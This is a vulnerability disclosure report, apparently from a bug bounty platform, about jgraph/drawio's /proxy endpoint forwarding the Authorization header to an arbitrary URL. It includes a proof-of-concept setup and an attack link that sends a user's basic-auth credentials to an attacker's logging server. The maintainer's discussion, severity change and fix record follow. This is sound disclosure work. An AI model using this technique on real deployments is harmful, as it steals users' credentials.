Forward credential header to attacker host in jgraph/drawio

Valid

Reported on

Jun 14th 2022


Description

Some Admins set the "Authorization" header with the help of a reverse proxy to restrict initial access to the Drawio application server. In this kind of setup, the "Authorization" header should always be sent to the reverse proxy, and the reverse proxy will forward it to Drawio But The Problem is in the /proxy endpoint. This Header is redirected to the URL provided to the URL parameter.

The Server receives the "Authorization" header at this line

then the header will be sent to the destination host because of this line

Proof of Concept

Default.conf

server {
    listen 80;
    auth_basic           "Administrators Area";
    auth_basic_user_file /etc/nginx/.htpasswd;

    location ~ /* {
    proxy_pass http://127.0.0.2:8080;
    }

    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
    root /usr/share/nginx/html;
    }
}

commands ( run in order)

docker run --rm -it  -p 127.0.0.2:8080:8080 -p 8443:8443 jgraph/drawio 
docker run -d --network host --name nginx-base -p 80:80 nginx:latest

sudo docker cp ./Default.conf nginx-base:/etc/nginx/conf.d/

apt install apache2-utils
htpasswd -c /etc/apache2/.htpasswd user1
# enter a simple password
docker cp /etc/apache2/.htpasswd nginx-base:/etc/nginx/.htpasswd

sudo docker exec nginx-base nginx -s reload

1.Go to your IP/host at port 80

2.Send this URL as an attacker to users: http://Your_IP/proxy?url=A_HTTP_logger_server_Address then look at your HTTP logger server as an attacker server.

3.the "Authorization" header is already forwarded to the attacker server.

Attack summary

The attacker sends the provided link to a user ==> user opens the link ==> user enters the user/pass or user/pass already is cached in browser ==> the "Authorization" header created now ==> this header will send to reverse proxy ==> the reverse proxy forward the header to Drawio /proxy endpoint ==> the proxy endpoint will forward the "Authorization" header to the URL in url parameter

Impact

If we assume that the basic Authorization is already set and these credentials are used for another application on that server, In that case, the attacker, with the help of the /proxy endpoint, can redirect the "Authorization" header to their server and steal the credentials. So definitely, the other applications can be affected by this vulnerability, so the Scope will be changed. Because of the impact on other applications on the same server, we have low Confidentiality and low Integrity impact. Also, the availability of this server can be affected because before this. The application only was available for some particular users.

So I think the 7.1 point is a good score for CVSS.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 12 days ago
amammad modified the report
12 days ago
David Benson
11 days ago

Maintainer


"Drawio gets the "Authorization" header from users." What authorization are you saying exists in the proxy?

David Benson
11 days ago

Maintainer


Please provide a full proof of concept, your description is lacking a number of key details. Why would a different application send headers if hosted of on a different port?

amammad modified the report
11 days ago
amammad
11 days ago

Researcher


Please accept my apologies, I was so tired last night and I missed some things in this report.

I tested it with the provided POC, If I Make a Video POC, please tell me.

amammad modified the report
11 days ago
amammad modified the report
11 days ago
amammad modified the report
11 days ago
amammad
11 days ago

Researcher


I add Attack summary to provide a better path of the attack scenario.

David Benson
11 days ago

Maintainer


OK, I follow now:

auth_basic           "Administrators Area";
auth_basic_user_file /etc/nginx/.htpasswd;

is required, so a vanilla setup won't be subject to this. I rate the complexity as high because of this combined with depending on the authenicated user loading a URL given to them by the attacker

I don't see any justification for any availability effect, either. That requires "reduced performance or reductions in resource availability".

7.1 is too high, that suggests that everyone who has deployed the project needs to update, since it's a high. It's pretty unlikely that anyone's deployment is going to be affected by this, high is too alarmist.

David Benson modified the Severity from High (7.1) to Medium (4.2) 11 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
David Benson validated this vulnerability 11 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on 409d66 11 days ago
The fix bounty has been dropped
ProxyServlet.java#L91 has been validated
to join this conversation